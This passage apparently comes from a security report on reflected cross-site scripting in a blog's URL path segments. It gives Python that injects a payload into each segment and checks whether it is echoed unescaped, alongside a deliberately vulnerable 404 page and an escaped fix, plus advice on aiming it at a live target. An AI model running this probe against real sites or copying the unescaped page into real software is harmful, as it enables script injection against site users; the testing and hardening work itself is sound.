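    /pandora/archives/2008/11/ parameter 3 is '2008'. The trailing slash is
    preserved so the rest of the route is left untouched.
    """
    trailing = path.endswith("/")
    segments = [s for s in path.split("/") if s]
    if not 1 <= index <= len(segments):
        raise IndexError(f"path has {len(segments)} segments, no parameter {index}")
    segments[index - 1] += payload
    return "/" + "/".join(segments) + ("/" if trailing else "")


def vulnerable_404(request_path: str) -> str:
    """Constructed stand-in for an error page that interpolates the raw request
    path into HTML, which is the behaviour the responses above exhibit."""
    return (
        "<html><head><title>404 Not Found</title></head><body>"
        "<h1>Not Found</h1>"
        f"<p>The requested URL {request_path} was not found on this server.</p>"
        "</body></html>"
    )


def hardened_404(request_path: str) -> str:
    """Same page with the one fix that matters: HTML-escape the path before
    placing it in a text node, so '<' can never open a tag."""
    return (
        "<html><head><title>404 Not Found</title></head><body>"
        "<h1>Not Found</h1>"
        f"<p>The requested URL {html.escape(request_path, quote=True)} "
        "was not found on this server.</p>"
        "</body></html>"
    )


def check_segment(path: str, index: int, handler) -> dict:
    """Inject one segment, hand the resulting URL to `handler` (any function
    that returns a response body) and classify what came back."""
    payload = make_payload()
    url = inject_segment(path, index, payload)
    body = handler(url)
    return {
        "parameter": index,
        "url": url,
        "payload": payload,
        "reflected_unmodified": payload in body,
        "reflected_escaped": html.escape(payload, quote=True) in body,
    }


def scan_path(path: str, handler) -> list:
    """Run check_segment over every segment, as the report did for 1..4."""
    count = len([s for s in path.split("/") if s])
    return [check_segment(path, i, handler) for i in range(1, count + 1)]


def browser_encoded(url: str) -> str:
    """Browsers percent-encode '<' and '>' in a path before sending it; a
    handler that echoes the path without decoding sees %3Cscript%3E, not a tag."""
    return quote(url, safe="/")


if __name__ == "__main__":
    for result in scan_path("/pandora/archives/2008/11/", vulnerable_404):
        print(result["parameter"], result["url"], result["reflected_unmodified"])
```

To run this against a live target, pass check_segment a handler that performs the real request and returns the body. One caveat when confirming exploitability: the scanner puts '<' and '>' raw into the request line, whereas a victim's browser percent-encodes them in the path (browser_encoded shows that form), so the reflection is only reachable through a link if the server decodes the path before echoing it. Confirm in a browser rather than relying on the raw-probe result alone.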

3.198. http://blog.pandora.com/pandora/archives/2